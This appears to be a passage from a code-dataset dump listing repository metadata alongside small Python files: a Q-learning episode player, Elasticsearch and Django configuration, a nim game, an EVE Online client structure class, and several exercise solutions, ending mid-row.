blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
516373953da84479aba9b11e0bae3dbf7d26ccf5
|
bb41814dc79f56a082a777e17ed31320db43edf4
|
/reinforcement_learning/0x00-q_learning/4-play.py
|
d6b4d54e98814a6ad8799721a6031a8177cbde91
|
[] |
no_license
|
garimasinghgryffindor/holbertonschool-machine_learning
|
a92c619b6ad2d110ed97b33fa9903f5134c96866
|
856ee36006c2ff656877d592c2ddb7c941d63780
|
refs/heads/master
| 2023-08-01T09:58:13.863062 | 2020-11-28T00:50:55 | 2020-11-28T00:50:55 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 674 |
py
|
#!/usr/bin/env python3
"""
Has the trained agent play an episode
"""
import numpy as np
def play(env, Q, max_steps=100):
    """
    Has the trained agent play an episode, always acting greedily.
    :param env: is the FrozenLakeEnv instance
    :param Q: is a numpy.ndarray containing the Q-table
    :param max_steps: is the maximum number of steps in the episode
    :return: the total rewards for the episode (the last reward received;
        0 if the episode does not terminate within max_steps)
    """
    state = env.reset()
    env.render()
    # BUG FIX: the original returned None when the episode did not finish
    # within max_steps, and never reached env.close() on early termination.
    reward = 0
    for _ in range(max_steps):
        # act greedily with respect to the learned Q-table
        action = np.argmax(Q[state])
        state, reward, done, _info = env.step(action)
        env.render()
        if done:
            break
    env.close()
    return reward
|
[
"[email protected]"
] | |
e79fb1916d742af9ebab6860a5bdb652ce86a1d1
|
ede6ee7bdbd76dbb39ffcddfc98725062566ebf4
|
/barbados/indexes/list.py
|
6c9b98ec709fd610d48643a70555b79387304c46
|
[] |
no_license
|
cohoe/barbados
|
cfa3cb4fab8c183fc4a4f943f452a89ebe193ea2
|
343f8fd4ac1f18e5e93d519cbc064693280e4d00
|
refs/heads/master
| 2021-08-07T12:33:53.263230 | 2021-07-18T01:59:16 | 2021-07-18T01:59:16 | 234,824,108 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 541 |
py
|
from elasticsearch_dsl import Document, Text, InnerDoc, Object
from barbados.indexes.base import BaseIndex, BarbadosIndex
class ListItemIndex(InnerDoc):
    """Nested document for one entry on a list: a cocktail slug plus an
    optional spec slug."""
    # whitespace analyzer keeps slugs as single, exact tokens
    cocktail_slug = Text(analyzer='whitespace', search_analyzer='whitespace')
    spec_slug = Text(analyzer='whitespace', search_analyzer='whitespace')
class ListIndex(Document, BarbadosIndex):
    """Elasticsearch index mapping for lists of cocktails."""
    # whitespace analyzer keeps the id as one exact token
    id = Text(analyzer='whitespace', search_analyzer='whitespace')
    display_name = Text()
    # list entries stored as nested objects (see ListItemIndex)
    items = Object(ListItemIndex, multi=True)

    class Index(BaseIndex):
        # physical index name in Elasticsearch
        name = 'list'
|
[
"[email protected]"
] | |
e1bb0795b99caf9bd0e6effbaf3c0a068848378b
|
12b7dc1d608b0deca429485493482afca5f99736
|
/app/config/settings/dev.py
|
8f40045b1ceefb621445b8de6efa70ce96e82c8e
|
[] |
no_license
|
Ryanden/EB-Docker-Deploy2-practice-
|
3c147786ccb6567c8e325ac79527052a15152a4a
|
4e12f4e35da6d26979b6915165227f9167c507d5
|
refs/heads/master
| 2022-12-09T09:37:51.404751 | 2019-05-16T05:04:15 | 2019-05-16T05:04:15 | 142,002,119 | 0 | 0 | null | 2022-12-08T02:36:17 | 2018-07-23T10:58:30 |
Python
|
UTF-8
|
Python
| false | false | 369 |
py
|
from .base import *
# Development settings overlay. `json`, `os` and SECRETS_DIR are presumably
# provided by the star import from .base -- TODO confirm against base.py.
# BUG FIX: the original `json.load(open(...))` never closed the file handle.
with open(os.path.join(SECRETS_DIR, 'dev.json')) as _secrets_file:
    secrets = json.load(_secrets_file)

DEBUG = True

INSTALLED_APPS += [
    'storages',           # django-storages (S3 backend below)
    'django_extensions',
]

DEFAULT_FILE_STORAGE = 'config.storages.S3DefaultStorage'
AWS_STORAGE_BUCKET_NAME = secrets['AWS_STORAGE_BUCKET_NAME']
WSGI_APPLICATION = 'config.wsgi.dev.application'
DATABASES = secrets['DATABASES']
|
[
"[email protected]"
] | |
d20bfefcbb689e95a0e699712752808cee0aabd1
|
5966449d2e29c9b64351895db2932f94f9de42da
|
/catkin_ws/build/calibration_common/catkin_generated/pkg.develspace.context.pc.py
|
74b3622b6da1649f18d3cf518a907cdaf2f04265
|
[] |
no_license
|
godaeseong/GoHriProject
|
8cbce6934485b8ba3253fc7b6c5b5b59397b4518
|
425e70b7c91b6215f5477fc2250d2b0ac96577be
|
refs/heads/master
| 2021-05-11T22:11:56.099580 | 2018-01-15T02:20:43 | 2018-01-15T02:20:43 | 117,484,817 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 613 |
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
# NOTE: auto-generated by catkin at configure time -- do not edit by hand.
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/hri/catkin_ws/src/calibration_toolkit/calibration_common/include;/usr/include/eigen3".split(';') if "/home/hri/catkin_ws/src/calibration_toolkit/calibration_common/include;/usr/include/eigen3" != "" else []
PROJECT_CATKIN_DEPENDS = "cmake_modules;image_geometry".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "calibration_common"
PROJECT_SPACE_DIR = "/home/hri/catkin_ws/devel/.private/calibration_common"
PROJECT_VERSION = "1.0.0"
|
[
"[email protected]"
] | |
6c191364901cf72b6e7ec942af7f4fc7c333ad1a
|
fc353b0433348ff58841cf32bf1f5e594e037513
|
/leetcode/830.py
|
8c5023a11d45ce74865a0054c858b8aaa012615c
|
[] |
no_license
|
TrellixVulnTeam/Demo_933I
|
ce759ec52dd191f99b998862f4aba7971878ba37
|
ab662060eb07a88a48c9832e09bf268517c1a3fa
|
refs/heads/master
| 2023-04-27T16:55:29.627491 | 2021-05-07T05:38:58 | 2021-05-07T05:38:58 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 230 |
py
|
from graphics import *
import math
# Draws points on a 1000x1000 canvas using the `graphics` teaching library.
spriaal = GraphWin("Joonistus", 1000, 1000)
a = 5
b = 4
while True:
    # BUG FIX: math.pi is a constant, not a function -- calling it raised
    # TypeError on the first iteration.
    x = math.sin(a + math.pi / 2)
    # BUG FIX: math.sin() requires an argument; presumably the vertical
    # component uses the same angle -- TODO confirm intended formula.
    y = math.sin(a)
    pt = Point(x + 500, y + 500)
    pt.draw(spriaal)
    # Advance the angle so successive points differ (the original never
    # updated `a` and would have redrawn the same point forever).
    a += b
|
[
"[email protected]"
] | |
0474c7ac7fcab24e97fcd8a5d1fc67dd45461b2f
|
3a476e0de377d1580facbfd78efdfbca009ed7a3
|
/uct_test.py
|
403c551b8a4100fa685aca7eda34a6d39cf067a1
|
[
"MIT"
] |
permissive
|
liuruoze/Thought-SC2
|
b7366186dbb4494fabdb3e0104354665e21ff707
|
b3cfbeffbfa09b952c596805d2006af24613db2d
|
refs/heads/master
| 2023-04-28T11:47:56.771797 | 2021-01-15T00:25:26 | 2021-01-15T00:25:26 | 296,185,180 | 4 | 2 |
MIT
| 2023-04-24T09:06:48 | 2020-09-17T01:17:04 |
Python
|
UTF-8
|
Python
| false | false | 1,300 |
py
|
# GPUs exposed to TensorFlow for this run.
USED_DEVICES = "6,7"
import os
# Order devices by PCI bus id so the indices above are stable, and restrict
# visibility; both must be set before TensorFlow is imported below.
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = USED_DEVICES
from uct.numpy_impl import *
import tensorflow as tf
from prototype.dynamic_network import DynamicNetwork
from prototype.hier_network import HierNetwork
def test(is_restore_policy=True, is_restore_dynamic=True):
    """Load the hierarchical policy/dynamics networks and time a UCT search.

    :param is_restore_policy: restore policy-network weights from checkpoint
    :param is_restore_dynamic: restore dynamics-model weights from checkpoint
    """
    # train model
    config = tf.ConfigProto(
        allow_soft_placement=True, log_device_placement=False,
    )
    config.gpu_options.allow_growth = True  # claim GPU memory on demand
    sess = tf.Session(config=config)
    hier_net = HierNetwork(sess, policy_path='./model/20181217-154646/probe')
    hier_net.initialize()
    if is_restore_policy:
        hier_net.restore_policy()
    policy_net = PolicyNetinMCTS(hier_net)
    dynamic_model_path = './model/20181223-174748_dynamic/probe'
    if is_restore_dynamic:
        hier_net.restore_dynamic(dynamic_model_path)
    dynamic_net = hier_net.dynamic_net
    num_reads = 100  # number of UCT simulations to time
    import time
    tick = time.time()
    print(UCT_search(GameState(dynamic_net), num_reads, policy_net))
    tock = time.time()
    print("Took %s sec to run %s times" % (tock - tick, num_reads))
    #import resource
    #print("Consumed %sB memory" % resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)


if __name__ == "__main__":
    test()
|
[
"[email protected]"
] | |
e10a899ea0e195ad55ab677dbc9616a9e3f64832
|
f72fa4432e6abb742cbf1c61c580db1ed688a311
|
/day27/s21crm/crm/forms/school.py
|
c8e42b166247fd56e11cee8ef0a4b0e7def14cb2
|
[] |
no_license
|
huningfei/python
|
7ddc9da14a3e53ad1c98fc48edd1697a6f8fc4f7
|
9ca1f57f2ef5d77e3bb52d70ac9a241b8cde54d2
|
refs/heads/master
| 2022-10-31T18:56:33.894302 | 2019-01-04T11:06:59 | 2019-01-04T11:06:59 | 128,178,516 | 2 | 1 | null | 2022-10-12T19:26:04 | 2018-04-05T08:25:32 |
Python
|
UTF-8
|
Python
| false | false | 401 |
py
|
from django import forms
from crm import models
class SchoolModelForm(forms.ModelForm):
    """ModelForm exposing every School field, with Bootstrap styling on
    the title widget."""

    class Meta:
        model = models.School  # NOTE: `model` (singular) -- do not write `models` here
        fields = '__all__'
        error_messages = {
            # message shown when title is left blank ("school cannot be empty")
            'title': {'required': '学校不能为空'}
        }
        widgets = {
            'title': forms.TextInput(attrs={'class': 'form-control'})
        }
|
[
"[email protected]"
] | |
909457621a61debda7558bb9f60c2c7feb57b2d0
|
76a402b7db1432f9bf8b9605416521a4284ce1e2
|
/nim_game.py
|
95d3be8cab232b6f99b6eef35ff32fa60baa5ddf
|
[] |
no_license
|
SuguruChhaya/nim-game
|
7aa915a475d414288fbb33957cad88ec4dac0c1d
|
6f345a36dc3a26ee8e5f89c139718a21b7050232
|
refs/heads/master
| 2022-12-13T01:30:04.352715 | 2020-09-22T23:42:51 | 2020-09-22T23:42:51 | 285,307,692 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,498 |
py
|
import random
'''
Not to create objects but just to manage the methods.
'''
class MainGame():
    """Counting ("nim"-style) game: players alternately add 1..increment to a
    running total; whoever reaches reaching_number loses."""

    def __init__(self, reaching_number, increment, goesfirst):
        # reaching_number: the losing total; increment: max amount per turn;
        # goesfirst: '0' = computer moves first, '1' = human moves first
        self.reaching_number = reaching_number
        self.increment = increment
        self.goesfirst = goesfirst
        #*Keeps track of the previous numbers
        self.total = 0
        self.current_choice = 0
        #*Finding the reaching_number - 1 number
        self.ending_win_number = self.reaching_number - 1
        self.follow_increment = self.increment + 1
        #*Rather than making the move based on the past move, I should try to get it close to the win_number_list
        # "Winning" totals are spaced increment+1 apart counting down from
        # reaching_number - 1; landing on one forces the opponent to lose.
        self.win_number_list = []
        for i in range(self.ending_win_number, 0, -1 * self.follow_increment):
            self.win_number_list.append(i)
        self.win_number_list = sorted(self.win_number_list)

    def gotoplayerturn(self):
        # Dispatch the opening turn based on the goesfirst flag.
        if self.goesfirst == '0':
            self.no_input_character()
        elif self.goesfirst == '1':
            self.input_character()

    def no_input_character(self):
        #*This function os for the characters without inputs (computer, you advice)
        print("\nThe computer's turn")
        print(f"\nCurrent total: {self.total}")
        if self.total not in self.win_number_list:
            # Move to the nearest winning total reachable this turn; the
            # spacing of win_number_list means at most one i matches.
            for i in self.win_number_list:
                if i > self.total and i - self.total <= self.increment:
                    self.current_choice = i - self.total
                    print(f"The computer chooses: {self.current_choice}\n")
                    self.total += self.current_choice
        #*Just in case the player knows the strategy and there is no hope to win,
        #*I will pick a random int
        elif self.total in self.win_number_list:
            self.current_choice = random.randint(1, self.increment)
            print(f"The computer chooses: {self.current_choice}\n")
            self.total += self.current_choice
        if self.total >= self.reaching_number:
            print(f"The computer reached {self.reaching_number}.")
            print("The computer loses.")
        else:
            self.input_character()

    def input_character(self):
        #*This function is for the characters with inputs (you, your friend)
        not_valid = True
        while not_valid:
            print('\nYour turn:')
            print(f"\nCurrent total: {self.total}")
            print(f"Pick the increment (max:{self.increment})")
            self.current_choice = input("You choose: ")
            try:
                self.current_choice = int(self.current_choice)
                if not 1 <= self.current_choice <= self.increment:
                    # out-of-range choice: re-prompt via the except below
                    raise(ValueError)
                else:
                    self.total += self.current_choice
                    not_valid = False
                    if self.total >= self.reaching_number:
                        print(f"You reached {self.reaching_number}.")
                        print("You lose.")
                    else:
                        # hand the turn back to the computer
                        self.no_input_character()
            except ValueError:
                print("Enter valid command or integer.")
                not_valid = True
# Interactive entry point: prompt for game parameters, validate them, and
# start a game. Loops until valid input is given.
print("\nWelcome to the nim game! \nYou will count from 1 to the reaching number. \nYou will choose the max increment and the reaching number.\nSince the computer will perform the best possible moves to win, you can use this program to beat your friends!")
not_valid = True
while not_valid:
    try:
        print("\nThe reaching number has to be between 20 and 100 (inclusive).")
        reaching_number_str = input("Enter reaching number: ")
        print("\nThe max increment has to be between 3 and 10 (inclusive).")
        incement_str = input("Enter max increment: ")
        reaching_number = int(reaching_number_str)
        increment = int(incement_str)
        not_valid = False
        if (not 20 <= reaching_number <= 100) or (not 3 <= increment <= 10):
            # out of bounds: re-prompt via the except handler
            raise(ValueError)
        else:
            zero_player = "The computer"
            one_player = "You"
            goesfirst = input(f"Who goes first: 0({zero_player}) or 1({one_player})>")
            if goesfirst in ['0', '1']:
                game = MainGame(reaching_number, increment, goesfirst)
                game.gotoplayerturn()
            else:
                raise (ValueError)
    except ValueError:
        print("Enter a valid command or integer.")
        not_valid = True
|
[
"[email protected]"
] | |
6759479a9640fc8ea7ba928109da4abbb456fb4a
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/25/usersdata/112/12124/submittedfiles/av1_3.py
|
0b936ae903da1273501fd3e5f09c85bf73708585
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 219 |
py
|
# -*- coding: utf-8 -*-
from __future__ import division
import math
# NOTE(review): student exercise submission; the logic below looks unfinished.
zeta=0
tan=0  # NOTE(review): never used
# Python 2 semantics (file imports __future__ division): input() evaluates
# the typed expression, so a and b are numbers, not strings.
a=input('Digite o valor de a')
b=input('Digite o valor de b')
c=a%b
while a%b!=0:
    if b%c!=0:
        # NOTE(review): sets b to zeta (initially 0), so the next a%b would
        # raise ZeroDivisionError -- presumably not the intended GCD step.
        b=zeta
    zeta=a
print(zeta)
|
[
"[email protected]"
] | |
36eef88f9be11b834b7c966f8e0e37c3e0e6c41b
|
8388d0ed8ad412c47d47dd9da8f05e35f7e2644c
|
/accepted/48-rotate-image.py
|
7a18dd7fa4f48ec671c91742020ac5e4795f1851
|
[] |
no_license
|
luodichen/leetcode-solution
|
d4cd5abbb0f5cf640035b563ed566c706d4fcbed
|
74c2f9e0e60e64c84be6db9b0511db037d12b109
|
refs/heads/master
| 2020-05-16T16:45:42.056541 | 2015-11-16T05:41:59 | 2015-11-16T05:41:59 | 39,545,259 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 606 |
py
|
# https://leetcode.com/problems/rotate-image/
class Solution:
    # @param {integer[][]} matrix
    # @return {void} Do not return anything, modify matrix in-place instead.
    def rotate(self, matrix):
        """Rotate *matrix* 90 degrees clockwise, mutating it in place.

        Row i of the result is column i read from the bottom row upward.
        FIX: uses `range` instead of the Python-2-only `xrange` (identical
        behavior on Python 2, works on Python 3), and a slice assignment
        instead of `del matrix[:]` plus an append loop.
        """
        if not matrix:
            return list()  # preserve the original empty-input return value
        rotated = [[row[i] for row in matrix[::-1]] for i in range(len(matrix[0]))]
        matrix[:] = rotated
|
[
"[email protected]"
] | |
810e8fc904dfdccceb4282cca5aa2a50ec0181a8
|
5864e86954a221d52d4fa83a607c71bacf201c5a
|
/eve/client/script/environment/spaceObject/structure.py
|
88fcfaaef3632e06940848939a4cc0691a53f89d
|
[] |
no_license
|
connoryang/1v1dec
|
e9a2303a01e5a26bf14159112b112be81a6560fd
|
404f2cebf13b311e754d45206008918881496370
|
refs/heads/master
| 2021-05-04T02:34:59.627529 | 2016-10-19T08:56:26 | 2016-10-19T08:56:26 | 71,334,417 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,417 |
py
|
#Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\eve\client\script\environment\spaceObject\structure.py
import blue
import uthread
import structures
import evetypes
import logging
from eve.client.script.environment.spaceObject.buildableStructure import BuildableStructure
from eve.client.script.environment.model.turretSet import TurretSet
from evegraphics.explosions.spaceObjectExplosionManager import SpaceObjectExplosionManager
# Client-side animation states for a structure model.
STATE_CONSTRUCT = 'construct'
STATE_VULNERABLE = 'vulnerable'
STATE_INVULNERABLE = 'invulnerable'
STATE_SIEGED = 'sieged'
STATE_DECONSTRUCT = 'deconstruct'
# Map server-side structure states to the animation states above.
STATES = {structures.STATE_UNKNOWN: STATE_INVULNERABLE,
 structures.STATE_UNANCHORED: STATE_DECONSTRUCT,
 structures.STATE_ANCHORING: STATE_CONSTRUCT,
 structures.STATE_ONLINE: STATE_INVULNERABLE,
 structures.STATE_SHIELD_VULNERABLE: STATE_VULNERABLE,
 structures.STATE_SHIELD_REINFORCE: STATE_SIEGED,
 structures.STATE_ARMOR_VULNERABLE: STATE_VULNERABLE,
 structures.STATE_ARMOR_REINFORCE: STATE_SIEGED,
 structures.STATE_HULL_VULNERABLE: STATE_VULNERABLE}
class Structure(BuildableStructure):
    """Client-side space object for a player-built structure.

    Tracks the server slim-item state, drives build/teardown animations,
    and (un)fits turret hardpoints when the fitted module set changes.
    Python 2 code (long literal, dict.iteritems).
    """
    __unloadable__ = True  # model may be unloaded when out of view

    def __init__(self):
        BuildableStructure.__init__(self)
        self.Init()

    def Release(self):
        # Reset local state when the object is released.
        BuildableStructure.Release(self)
        self.Init()

    def Init(self):
        """Reset per-instance state (called from __init__ and Release)."""
        self.fitted = False   # whether hardpoints are currently fitted
        self.state = None     # last server structure state seen
        self.timer = None     # (start, end, paused) anchoring timer tuple
        self.turrets = []     # turret sets created by FitHardpoints
        self.modules = {}     # module key -> turret set
    def Assemble(self):
        self.SetStaticRotation()
        self.SetupSharedAmbientAudio()
        self.OnSlimItemUpdated(self.typeData.get('slimItem'))

    def OnSlimItemUpdated(self, item):
        """React to a slim-item update: switch animation state and refit
        hardpoints if the module set with graphics changed."""
        if item is None or self.unloaded:
            return
        if item.state and (item.state != self.state or item.timer != self.timer):
            if item.timer and item.state == structures.STATE_ANCHORING:
                start, end, paused = item.timer
                # NOTE(review): `const` appears to be an injected EVE-client
                # builtin (not imported in this file) -- confirm.
                duration = (end - start) / const.SEC
                elapsed = duration - max(end - blue.os.GetWallclockTime(), 0L) / const.SEC
            else:
                duration = 0
                elapsed = 0
            self.state = item.state
            self.timer = item.timer
            self.GotoState(STATES[self.state], duration, elapsed)
        # Refit when the set of modules that have a graphic differs from
        # what is currently shown.
        if set([ i[0] for i in item.modules or [] if evetypes.GetGraphicID(i[1]) is not None ]) != set(self.modules.keys()):
            uthread.new(self.ReloadHardpoints)

    def OnDamageState(self, damageState):
        BuildableStructure.OnDamageState(self, damageState)
        if self.model is not None and damageState is not None:
            # Replace missing damage components with 0.0 before applying.
            states = [ (d if d is not None else 0.0) for d in damageState ]
            self.model.SetImpactDamageState(states[0], states[1], states[2], False)

    def GotoState(self, state, totalTime = 0, elapsedTime = 0):
        """Kick off the animation for *state* on a worker tasklet."""
        if state == STATE_CONSTRUCT:
            uthread.new(self.BuildStructure, float(totalTime), float(elapsedTime))
        elif state == STATE_DECONSTRUCT:
            uthread.new(self.TearDownStructure, float(totalTime), float(elapsedTime))
        else:
            uthread.new(self.LoadModelWithState, state)

    def LoadModelWithState(self, newState):
        if self.model is None:
            self.LoadModel()
        self.TriggerAnimation(newState)
        self.FitHardpoints()
        self.StartStructureLoopAnimation()

    def LoadModel(self, fileName = None, loadedModel = None):
        # Signature kept for base-class compatibility; both args are unused.
        self.model = self.GetStructureModel()
        self.SetAnimationSequencer(self.model)
        self.NotifyModelLoaded()

    def ReloadHardpoints(self):
        self.UnfitHardpoints()
        self.FitHardpoints()

    def UnfitHardpoints(self):
        """Drop all turret sets while keeping non-turret modules."""
        if not self.fitted:
            return
        self.logger.debug('Unfitting hardpoints')
        newModules = {}
        for key, val in self.modules.iteritems():
            if val not in self.turrets:
                newModules[key] = val
        self.modules = newModules
        del self.turrets[:]
        self.fitted = False

    def FitHardpoints(self, blocking = False):
        """Create turret sets for the model (no-op if already fitted or the
        model is not loaded)."""
        if self.fitted:
            return
        if self.model is None:
            self.logger.warning('FitHardpoints - No model')
            return
        self.logger.debug('Fitting hardpoints')
        self.fitted = True
        newTurretSetDict = TurretSet.FitTurrets(self.id, self.model, self.typeData.get('sofFactionName', None))
        self.turrets = []
        for key, val in newTurretSetDict.iteritems():
            self.modules[key] = val
            self.turrets.append(val)

    def LookAtMe(self):
        # Camera-focus callback: ensure hardpoints exist when inspected.
        if not self.model:
            return
        if not self.fitted:
            self.FitHardpoints()

    def StopStructureLoopAnimation(self):
        animationUpdater = self.GetStructureModel().animationUpdater
        if animationUpdater is not None:
            animationUpdater.PlayLayerAnimation('TrackMaskLayer1', 'Layer1Loop', False, 1, 0, 1, True)

    def StartStructureLoopAnimation(self):
        animationUpdater = self.GetStructureModel().animationUpdater
        if animationUpdater is not None:
            animationUpdater.PlayLayerAnimation('TrackMaskLayer1', 'Layer1Loop', False, 0, 0, 1, True)

    def BuildStructure(self, anchoringTime, elapsedTime):
        """Play the construction animation and schedule its completion."""
        self.LoadUnLoadedModels()
        self.logger.debug('Structure: BuildStructure %s', self.GetTypeID())
        self.PreBuildingSteps()
        delay = int((anchoringTime - elapsedTime) * 1000)  # remaining ms
        uthread.new(self._EndStructureBuild, delay)
        self.TriggerAnimation(STATE_CONSTRUCT, curveLength=anchoringTime, elapsedTime=elapsedTime)

    def _EndStructureBuild(self, delay):
        blue.pyos.synchro.SleepSim(delay)
        if self.released or self.exploded:
            return
        self.StartStructureLoopAnimation()
        self.PostBuildingSteps(True)
        self.LoadModel()

    def TearDownStructure(self, unanchoringTime, elapsedTime):
        """Play the deconstruction animation and schedule its completion."""
        self.LoadUnLoadedModels()
        self.logger.debug('Structure: TearDownStructure %s', self.GetTypeID())
        self.StopStructureLoopAnimation()
        self.PreBuildingSteps()
        delay = int((unanchoringTime - elapsedTime) * 1000)  # remaining ms
        uthread.new(self._EndStructureTearDown, delay)
        self.TriggerAnimation(STATE_DECONSTRUCT, curveLength=unanchoringTime, elapsedTime=elapsedTime)

    def _EndStructureTearDown(self, delay):
        blue.pyos.synchro.SleepSim(delay)
        if self.released or self.exploded:
            return
        self.PostBuildingSteps(False)
        self.model = self.GetNanoContainerModel()

    def Explode(self, explosionURL = None, scaling = 1.0, managed = False, delay = 0.0):
        """Play the structure explosion; returns the wreck-switch delay."""
        if SpaceObjectExplosionManager.USE_EXPLOSION_BUCKETS:
            self.logger.debug('Exploding with explosion bucket')
            # NOTE(review): `sm` looks like an injected service-manager
            # builtin (EVE client convention) -- confirm.
            scene = sm.GetService('space').GetScene()
            wreckSwitchTime, _, __ = SpaceObjectExplosionManager.ExplodeBucketForBall(self, scene)
            return wreckSwitchTime
        explosionURL, (delay, _) = self.GetExplosionInfo()
        explosionLocatorSets = None
        if hasattr(self.model, 'locatorSets'):
            explosionLocatorSets = self.model.locatorSets.FindByName('explosions')
        rotation = self.GetStaticRotation()
        self.explosionManager.PlayClientSideExplosionBall(explosionURL, (self.x, self.y, self.z), rotation, explosionLocatorSets)
        return delay
|
[
"[email protected]"
] | |
d52e595dc32e6ffdf0abd0ec6fc0f348ce9ada5e
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03089/s662353627.py
|
14c606722f6e0774d8c3d2625e893ec714620f0c
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 365 |
py
|
# Read the sequence length and the target sequence b_1..b_n.
n = int(input())
b = list(map(int , input().split()))
def f(c):
    """Scan *c* from the back for an element equal to its 1-based position.

    Returns (value, c with that element removed) for the right-most such
    element, or (-1, c) when none exists.
    """
    idx = len(c) - 1
    while idx >= 0:
        if c[idx] == idx + 1:
            remainder = c[:idx] + c[idx + 1:]
            return (c[idx], remainder)
        idx -= 1
    return (-1, c)
# Repeatedly remove the right-most element equal to its 1-based index; the
# removal order reversed is a valid construction order. If at any point no
# such element exists, the sequence is unobtainable: print -1 and stop.
ans = []
for i in range(n):
    (a, b) = f(b)
    if a == -1:
        print(-1)
        exit()
    ans.append(a)
#print(ans, b)
print('\n'.join(map(str, reversed(ans))))
|
[
"[email protected]"
] | |
7249037b709c0aa0c8542843b0645547e32df6f8
|
a08492c20c6bda0282170fee569f3cd199876ec7
|
/scr/return_directories.py
|
6e090bc090e123ede17864f4f68be58e20f41193
|
[] |
no_license
|
GregoryREvans/evans
|
a7744011ccd2395e15d325092e85a31379717e6d
|
7b0f7caa55e1c4b2a733b9b6fc42230a43313fb6
|
refs/heads/master
| 2023-08-31T04:29:31.296222 | 2023-08-21T02:32:12 | 2023-08-21T02:32:12 | 143,075,881 | 4 | 1 | null | 2021-06-06T07:27:38 | 2018-07-31T22:22:06 |
Python
|
UTF-8
|
Python
| false | false | 425 |
py
|
import pathlib
def return_directories(
    p="/Users/gregoryevans/Scores",
    ignores=("_archive", ".mypy_cache", "_squonk", "akasha", "stirrings_still"),
):
    """Return the sorted subdirectories of *p*, skipping names in *ignores*.

    :param p: directory to scan (str or pathlib.Path)
    :param ignores: directory names to exclude
    :return: list of pathlib.Path objects, sorted by name
    """
    build_path = pathlib.Path(p)
    returns = []
    for score in sorted(build_path.iterdir()):
        if not score.is_dir():
            continue
        if score.name in ignores:
            continue
        returns.append(score)
    # BUG FIX: the original ended with the bare expression `returns`,
    # so the function always returned None.
    return returns
|
[
"[email protected]"
] | |
c37631b47a0b6af83326403ee829649b804d3d58
|
f9697acaab8a8ee05ccbd5368f6c72ad8c5dd485
|
/backend/test_23115/wsgi.py
|
d1ce4e85722e439b0c888cf764cf31d84dc3e907
|
[] |
no_license
|
crowdbotics-apps/test-23115
|
f6fd5b199d5586aed78f0a9844062c83ee0ab574
|
c6e7f7cf32130aa45fb31bba3fa67ad8e0346e82
|
refs/heads/master
| 2023-01-24T22:13:58.393735 | 2020-12-01T16:37:00 | 2020-12-01T16:37:00 | 317,603,669 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 397 |
py
|
"""
WSGI config for test_23115 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project's settings module (unless already set),
# then build the module-level WSGI callable the server looks up.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'test_23115.settings')
application = get_wsgi_application()
|
[
"[email protected]"
] | |
16e7a75e20aad03573da75c844a7329f52d68fe5
|
32c56293475f49c6dd1b0f1334756b5ad8763da9
|
/google-cloud-sdk/lib/surface/container/node_pools/__init__.py
|
245eda35f54a0e9605d06f2abed352e8ec9f670c
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"MIT"
] |
permissive
|
bopopescu/socialliteapp
|
b9041f17f8724ee86f2ecc6e2e45b8ff6a44b494
|
85bb264e273568b5a0408f733b403c56373e2508
|
refs/heads/master
